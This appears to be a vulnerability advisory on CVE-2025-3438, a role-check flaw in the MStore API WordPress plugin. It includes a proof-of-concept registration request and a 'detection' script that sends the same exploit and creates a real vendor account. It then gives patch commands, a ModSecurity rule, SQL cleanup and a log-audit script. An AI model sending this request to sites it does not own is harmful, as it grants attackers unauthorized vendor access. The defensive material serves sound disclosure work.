How CVE-2025-3438 Works
The MStore API plugin for WordPress (up to v4.17.4) fails to enforce role restrictions during user registration. An unauthenticated attacker can exploit this flaw to register as a `wcfm_vendor`, the Store Vendor role in the WCFM Marketplace plugin; the escalation is therefore only possible when WCFM Marketplace is active. The vulnerability stems from improper role validation during registration, which lets attackers bypass the intended permissions. A partial patch was released in v4.17.3 but did not fully mitigate the issue.
DailyCVE Form
Platform: WordPress
Version: ≤4.17.4
Vulnerability: Privilege Escalation
Severity: Critical
Date: 05/06/2025
What Undercode Say:
Exploit Analysis:
1. Exploit Path:
   - Send a crafted POST request to `/wp-json/mstore/v1/register`.
   - Specify the `wcfm_vendor` role in the payload.
2. Proof-of-Concept (PoC) Request:

```http
POST /wp-json/mstore/v1/register HTTP/1.1
Host: vulnerable.site
Content-Type: application/json

{
  "username": "attacker",
  "email": "[email protected]",
  "role": "wcfm_vendor"
}
```
Mitigation Commands:
1. Immediate Patch:

```shell
wp plugin update mstore-api --version=4.17.5
```

2. Temporary Workaround (removes the vendor role the exploit targets; confirm the installed slug with `wp plugin list --status=active` first):

```shell
wp plugin deactivate wcfm-marketplace
```
Detection Script (Python):

```python
import requests


def check_vulnerability(url):
    # Attempts the unauthenticated registration with the wcfm_vendor role.
    # A positive result means a real vendor account was created on the site;
    # remove it afterwards.
    payload = {
        "username": "test",
        "email": "[email protected]",
        "role": "wcfm_vendor",
    }
    response = requests.post(f"{url}/wp-json/mstore/v1/register", json=payload, timeout=10)
    return "role" in response.text and "wcfm_vendor" in response.text


if __name__ == "__main__":
    if check_vulnerability("http://target.site"):
        print("[!] Vulnerable to CVE-2025-3438")
```
Protection Steps:
1. WAF Rule (ModSecurity). The exploit sends a JSON body, so `ARGS` is only populated if the JSON request body processor is enabled (`SecRequestBodyAccess On` is required); with that processor ModSecurity exposes top-level keys as `ARGS:json.<key>`, and the plain `ARGS:role` form covers form-encoded bodies:

```
SecRule REQUEST_HEADERS:Content-Type "@beginsWith application/json" \
    "id:1004,phase:1,pass,nolog,ctl:requestBodyProcessor=JSON"
SecRule ARGS:json.role|ARGS:role "@streq wcfm_vendor" \
    "id:1005,phase:2,deny,status:403,log,msg:'CVE-2025-3438 Exploit Attempt'"
```
2. Database Cleanup (table prefix `wp_` assumed; review before deleting, because a blanket DELETE on every `wcfm_vendor` row also strips legitimate vendors):

```sql
-- List every wcfm_vendor account with its registration time for review.
SELECT u.ID, u.user_login, u.user_registered FROM wp_users u
JOIN wp_usermeta m ON m.user_id = u.ID
WHERE m.meta_key='wp_capabilities' AND m.meta_value LIKE '%wcfm_vendor%';
-- Strip the vendor capabilities only from the reviewed rogue accounts (IDs are placeholders).
DELETE FROM wp_usermeta WHERE meta_key='wp_capabilities' AND meta_value LIKE '%wcfm_vendor%'
  AND user_id IN (/* reviewed rogue user IDs */);
```
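The detection script and the database cleanup above both leave the defender to decide which vendor accounts are rogue. The following audit pairs the two steps: it counts accepted POSTs to the register route in the web-server access log, flags `wcfm_vendor` accounts created since the first accepted one, and emits demotion commands for review. This is an added example, not code from the advisory, from MStore API or from WCFM; it assumes combined-format access logs and the JSON output of the real WP-CLI command `wp user list --fields=ID,user_login,user_email,user_registered,roles --format=json`, and every sample log line and user record in it is constructed.

```python
"""Post-incident audit for CVE-2025-3438 (unauthenticated wcfm_vendor registration).

Added example; not code from the advisory, from MStore API or from WCFM.
Assumed inputs: combined-format access log lines and the JSON export produced by
  wp user list --fields=ID,user_login,user_email,user_registered,roles --format=json
All sample data below is constructed.
"""
import json
import re
from datetime import datetime, timezone

REGISTER_ROUTE = "/wp-json/mstore/v1/register"

# Combined log format: client IP, timestamp, request line and status are all we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# Constructed sample: two accepted registrations from one client, one rejected attempt.
ACCESS_LOG = [
    '203.0.113.7 - - [06/May/2025:10:15:02 +0000] "POST /wp-json/mstore/v1/register HTTP/1.1" 200 312 "-" "python-requests/2.31"',
    '198.51.100.4 - - [06/May/2025:10:16:40 +0000] "GET /wp-json/mstore/v1/products HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [06/May/2025:10:17:05 +0000] "POST /wp-json/mstore/v1/register HTTP/1.1" 200 310 "-" "python-requests/2.31"',
    '192.0.2.9 - - [06/May/2025:10:18:11 +0000] "POST /wp-json/mstore/v1/register?x=1 HTTP/1.1" 400 95 "-" "curl/8.5"',
]

# Constructed sample of the WP-CLI JSON export (WordPress stores user_registered in GMT).
USER_EXPORT = json.dumps([
    {"ID": 1, "user_login": "admin", "user_email": "admin@example.com",
     "user_registered": "2023-01-10 09:00:00", "roles": "administrator"},
    {"ID": 42, "user_login": "legit_vendor", "user_email": "shop@example.com",
     "user_registered": "2024-03-01 12:00:00", "roles": "wcfm_vendor"},
    {"ID": 77, "user_login": "attacker", "user_email": "x@example.com",
     "user_registered": "2025-05-06 10:15:03", "roles": "wcfm_vendor"},
    {"ID": 78, "user_login": "newcustomer", "user_email": "c@example.com",
     "user_registered": "2025-05-06 11:00:00", "roles": "customer"},
])


def parse_log_ts(ts):
    """'06/May/2025:10:15:02 +0000' -> timezone-aware datetime."""
    return datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")


def registration_hits(log_lines):
    """Every POST to the vulnerable route as (ip, datetime, status)."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m["method"] == "POST" and m["path"].split("?")[0] == REGISTER_ROUTE:
            hits.append((m["ip"], parse_log_ts(m["ts"]), int(m["status"])))
    return hits


def suspicious_vendors(user_export, not_before):
    """wcfm_vendor accounts created at or after not_before (an aware UTC datetime)."""
    flagged = []
    for user in json.loads(user_export):
        # WP-CLI emits roles as a comma-separated string; accept a list as well.
        roles = user["roles"].split(",") if isinstance(user["roles"], str) else user["roles"]
        registered = datetime.strptime(user["user_registered"], "%Y-%m-%d %H:%M:%S")
        registered = registered.replace(tzinfo=timezone.utc)
        if "wcfm_vendor" in roles and registered >= not_before:
            flagged.append(user)
    return flagged


def audit(log_lines, user_export):
    """Correlate accepted register POSTs with vendor accounts created since the first one."""
    hits = registration_hits(log_lines)
    accepted = [h for h in hits if h[2] < 400]  # assumed: the plugin answers 2xx on success
    if not accepted:
        return {"register_posts": len(hits), "accepted": 0, "source_ips": [],
                "flagged_ids": [], "commands": []}
    window_start = min(h[1] for h in accepted)
    flagged = suspicious_vendors(user_export, window_start)
    # Demote rather than delete (real WP-CLI command): keeps the account for forensics.
    commands = [f"wp user set-role {u['ID']} subscriber" for u in flagged]
    return {
        "register_posts": len(hits),
        "accepted": len(accepted),
        "source_ips": sorted({h[0] for h in accepted}),
        "flagged_ids": [u["ID"] for u in flagged],
        "commands": commands,
    }


if __name__ == "__main__":
    print(json.dumps(audit(ACCESS_LOG, USER_EXPORT), indent=2))
```

The demotion commands are printed rather than executed so that the flagged list can be checked against legitimate vendor onboarding before any role is changed; accounts confirmed as rogue can then be removed with `wp user delete`.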
Impact: Full site compromise via vendor-level access.
Patch Reference: Update to MStore API ≥4.17.5.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub: Undercode